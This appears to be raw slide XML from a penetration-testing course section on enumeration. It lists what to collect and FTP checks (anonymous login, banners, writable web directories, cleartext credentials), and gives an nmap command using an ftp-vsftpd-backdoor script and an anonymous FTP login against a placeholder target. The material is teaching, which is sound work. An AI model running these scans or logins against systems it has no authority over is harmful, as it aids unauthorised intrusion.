              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="1664208"/>
            <a:ext cx="10515600" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Open port  -&gt;  service name  -&gt;  exact version  -&gt;  known weakness  -&gt;  access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="2788920"/>
            <a:ext cx="5486400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>WHAT YOU ARE COLLECTING</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="3154680"/>
            <a:ext cx="5394960" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Versions, down to the patch level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Usernames, from any service that leaks them</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Shares, directories and files you can read without credentials</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Configuration mistakes: anonymous access, default community strings, blank passwords</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="2788920"/>
            <a:ext cx="5486400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>HOW YOU WORK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="3154680"/>
            <a:ext cx="5303520" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>One service at a time, in order, writing everything down</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Automated tools first, then the same thing by hand when the tool says nothing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Read the banner. Services announce themselves out of politeness</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1958"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Every username you find goes in users.txt for later</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="6080760"/>
            <a:ext cx="11064240" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Most real findings are not exploits. They are somebody leaving a share, a script or an account where it should not be.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="13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03 / ENUMERATION</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FTP   port 21</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25</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 0" descr="img/t_ftp.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1481328"/>
            <a:ext cx="4937760" cy="3977640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5852160" y="1554480"/>
            <a:ext cx="5486400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>WHAT TO CHECK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5852160" y="1920240"/>
            <a:ext cx="5779008" cy="3108960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Anonymous login. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Username anonymous, any password. Still common on internal file servers.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The banner. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>It usually gives you the exact daemon and version for free.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Write access. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>If you can upload into a directory the web server serves, you have code execution.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Cleartext. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Credentials cross the wire in plain text. Anyone sniffing gets them.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="5669280"/>
            <a:ext cx="11091672" cy="771144"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7115"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694944" y="5806440"/>
            <a:ext cx="10799064" cy="496824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1740"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ nmap -p21 --script ftp-anon,ftp-syst,ftp-vsftpd-backdoor TARGET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1740"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ ftp TARGET        then user: anonymous     password: anything@anything.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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03 / ENUMERATION</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SSH   port 22</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26</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
